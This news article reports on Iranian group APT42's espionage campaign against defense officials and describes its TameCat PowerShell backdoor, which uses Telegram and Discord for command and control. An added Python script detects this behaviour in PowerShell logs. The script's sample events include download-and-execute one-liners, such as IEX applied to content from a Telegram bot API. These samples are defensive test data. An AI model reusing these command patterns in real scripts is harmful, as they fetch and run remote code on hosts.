
Iranian Hackers Target Defense and Government Officials in Ongoing Campaign

The state-sponsored APT has been targeting the victims’ family members to increase pressure on their targets. The post Iranian Hackers Target Defense and Government Officials in Ongoing Campaign appeared first on SecurityWeek.

Iran-US-Israel cyberattacks

The Iranian state-sponsored hacking group APT42 has been targeting senior defense and government officials in an ongoing, sophisticated espionage campaign, the Israel National Digital Agency (INDA) reports.

As part of the attacks, the hackers relied on social engineering and expanded their scope to the victims’ family members, both to widen the attack surface and to apply pressure on the primary targets.

Also known as Calanque, CharmingCypress, Educated Manticore, Mint Sandstorm, and UNC788, and associated with the Islamic Revolutionary Guard Corps (IRGC) intelligence agency, APT42 is tracked by the Israeli agency as SpearSpecter.

The new campaign uncovered by INDA involved invitations to conferences or meetings that either directed victims to spoofed web pages to harvest their credentials, or led to backdoor infections, for long-term access and data exfiltration.

The hackers were observed spending days or weeks building relationships with the intended victims and gathering intelligence via social media, public databases, and professional networks.

“This enables them to impersonate people from the victim’s affiliations and craft believable scenarios involving exclusive conferences or strategic meetings (physical in some cases). They sustain multi-day conversations to build credibility. Use of WhatsApp further adds perceived legitimacy,” INDA notes.

Based on the target’s value and the group’s operational objectives, the recipient is either directed to phishing pages or served a decoy document that triggers the deployment of APT42’s TameCat malware.

A sophisticated, modular PowerShell-based backdoor, TameCat establishes command-and-control (C&C) communication over Telegram and Discord, sets up persistence, performs system reconnaissance, and collects browser data and credentials.

It can also execute commands and exfiltrate data, and allows operators to dynamically load and execute additional payloads.

To evade detection, the malware operates as an in-memory loader, uses signed Windows binaries and common user tools to blend with normal activity, and employs various obfuscation techniques. It also uses an in-memory encryption mechanism to protect telemetry and controller payloads.

TameCat relies on Telegram to load its payloads. It evaluates each received message and, if the message lacks specific parameters, treats it as a PowerShell payload and executes it, then sends the result of the operation back as a message.

“This approach enables the attacker to maintain dynamic and resilient remote code execution capabilities on compromised hosts. This ensures persistence and operational continuity even when protective measures, such as Cloudflare, block the actor’s infrastructure,” INDA notes.

Discord, the agency explains, is used as a C&C channel for issuing unique commands to individual hosts while managing multiple attacks in parallel.
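The behaviour described above (a PowerShell loader that polls a consumer messaging API and executes what it receives) leaves a recognisable trace in PowerShell script-block logging (Windows Event ID 4104). The following Python detection logic is an added illustration, not code from INDA's report or from the article; it assumes a simple event dictionary format with `event_id`, `host`, `record_id` and `script_block` fields (a constructed schema, not any vendor's), and the four sample events are constructed, not real telemetry. It flags script blocks that combine a Telegram bot API or Discord API URL with a dynamic code-execution sink or an in-memory download cradle.

```python
"""Score PowerShell script-block events (Event ID 4104) for messaging-platform C&C patterns.
Added illustration only; sample events are constructed, field names are assumed."""
import re
from typing import Dict, Iterable, List

# Messaging services named in the report as TameCat C&C channels.
MESSAGING_API = re.compile(
    r"api\.telegram\.org/bot|discord(?:app)?\.com/api/", re.IGNORECASE)

# Sinks that turn fetched text into executed PowerShell.
EXEC_SINK = re.compile(
    r"\b(?:Invoke-Expression|IEX)\b|\[ScriptBlock\]::Create|&\s*\(\s*\$", re.IGNORECASE)

# Cradles that retrieve content without writing it to disk (in-memory loader behaviour).
DOWNLOAD_CRADLE = re.compile(
    r"Invoke-RestMethod|Invoke-WebRequest|Net\.WebClient|DownloadString|\birm\b|\biwr\b",
    re.IGNORECASE)


def score_scriptblock(text: str) -> Dict[str, object]:
    """Return which indicator classes matched and a severity for one script block."""
    hits = {
        "messaging_api": bool(MESSAGING_API.search(text)),
        "exec_sink": bool(EXEC_SINK.search(text)),
        "download_cradle": bool(DOWNLOAD_CRADLE.search(text)),
    }
    if hits["messaging_api"] and hits["exec_sink"]:
        severity = "high"      # content from a chat API flows into code execution
    elif hits["messaging_api"] and hits["download_cradle"]:
        severity = "medium"    # chat API reached via an in-memory cradle; tune for legit webhooks
    elif hits["messaging_api"]:
        severity = "low"       # plain notifications to chat services are common
    else:
        severity = "none"
    return {"severity": severity, **hits}


def scan_events(events: Iterable[Dict[str, object]]) -> List[Dict[str, object]]:
    """Apply score_scriptblock to every 4104 event and return the non-empty findings."""
    findings = []
    for ev in events:
        if ev.get("event_id") != 4104:       # only script-block logging events
            continue
        result = score_scriptblock(str(ev.get("script_block", "")))
        if result["severity"] != "none":
            findings.append({"record_id": ev.get("record_id"),
                             "host": ev.get("host"), **result})
    return findings


# Constructed sample events (not real telemetry; <TOKEN>/<ID> are placeholders).
SAMPLE_EVENTS = [
    {"record_id": 1, "host": "WS-01", "event_id": 4104,
     "script_block": "Get-ChildItem C:\\Users\\alice\\Documents | Measure-Object"},
    {"record_id": 2, "host": "WS-01", "event_id": 4104,
     "script_block": "$r = Invoke-RestMethod 'https://api.telegram.org/bot<TOKEN>/getUpdates'; "
                     "IEX $r.result[0].message.text"},
    {"record_id": 3, "host": "SRV-02", "event_id": 4104,
     "script_block": "Invoke-RestMethod -Uri 'https://discord.com/api/webhooks/<ID>/<TOKEN>' "
                     "-Method Post -Body @{content='backup finished'}"},
    {"record_id": 4, "host": "WS-03", "event_id": 4103,   # wrong event type, ignored
     "script_block": "IEX (New-Object Net.WebClient).DownloadString('https://api.telegram.org/bot<TOKEN>/getUpdates')"},
]

if __name__ == "__main__":
    for finding in scan_events(SAMPLE_EVENTS):
        print(finding)
```

Run against the sample set, record 2 scores high (Telegram API plus `IEX`), record 3 scores medium because a legitimate Discord webhook notification still goes through `Invoke-RestMethod`; in production that medium tier is where an allowlist of known notification scripts belongs, so that the high tier stays actionable. Script-block logging must be enabled for these events to exist at all, and the regexes are deliberately narrow, so obfuscated variants need decoding (for example of Base64 `-EncodedCommand` blocks) before they are scored.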

The backdoor uses four modules for system reconnaissance. They allow it to selectively gather high-value data from the victims’ systems, such as browser information, documents, screenshots, and system information, and exfiltrate it via encrypted channels.

“The SpearSpecter campaign’s infrastructure reflects a sophisticated blend of agility, stealth, and operational security designed to sustain prolonged espionage against high-value targets. The operators leverage a multifaceted infrastructure that combines legitimate cloud services with attacker-controlled resources, enabling seamless initial access, persistent C&C, and covert data exfiltration,” INDA notes.

Related: Iranian APT Targets Android Users With New Variants of DCHSpy Spyware

Related: US Charges 3 Iranians Over Presidential Campaign Hacking

Related: US Calls Reported Threats by Pro-Iran Hackers to Release Trump-Tied Material a ‘Smear Campaign’

Related: Iranian Hackers’ Preferred ICS Targets Left Open Amid Fresh US Attack Warning
